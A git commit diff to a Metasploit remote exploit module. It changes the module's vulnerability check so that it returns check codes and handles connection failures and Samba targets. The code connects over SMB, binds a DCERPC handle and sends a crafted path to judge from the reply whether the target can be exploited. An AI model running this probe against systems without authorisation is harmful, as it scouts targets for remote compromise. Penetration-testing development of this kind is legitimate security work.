return the appropriate check codes instead of just printing stuff. add some error checks to avoid stack traces against samba and non-existant hosts
git-svn-id: file:///home/svn/framework3/trunk@12314 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
d6edeebcef
commit
b5e0962e3e
|
@ -957,8 +957,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
begin
|
||||
connect()
|
||||
smb_login()
|
||||
rescue Rex::ConnectionError => e
|
||||
print_error("Connection failed: #{e.class}: #{e}")
|
||||
return
|
||||
end
|
||||
|
||||
#
|
||||
# Build the malicious path name
|
||||
|
@ -977,7 +982,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
handle = dcerpc_handle( '4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',
|
||||
'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
|
||||
)
|
||||
|
||||
begin
|
||||
# Samba doesn't have this handle and returns an ErrorCode
|
||||
dcerpc_bind(handle)
|
||||
rescue Rex::Proto::SMB::Exceptions::ErrorCode
|
||||
return Msf::Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
print_status("Verifying vulnerable status... (path: 0x%08x)" % path.length)
|
||||
|
||||
|
@ -992,16 +1003,17 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
resp = dcerpc.call(0x1f, stub)
|
||||
error = resp[4,4].unpack("V")[0]
|
||||
|
||||
if (error == 0x0052005c) # \R :)
|
||||
print_status("System is vulnerable.")
|
||||
else
|
||||
print_status("System is invulnerable (status: 0x%08x)" % error)
|
||||
end
|
||||
|
||||
# Cleanup
|
||||
simple.client.close
|
||||
simple.client.tree_disconnect
|
||||
disconnect
|
||||
|
||||
if (error == 0x0052005c) # \R :)
|
||||
return Msf::Exploit::CheckCode::Vulnerable
|
||||
else
|
||||
print_status("System is not vulnerable (status: 0x%08x)" % error) if error
|
||||
return Msf::Exploit::CheckCode::Safe
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue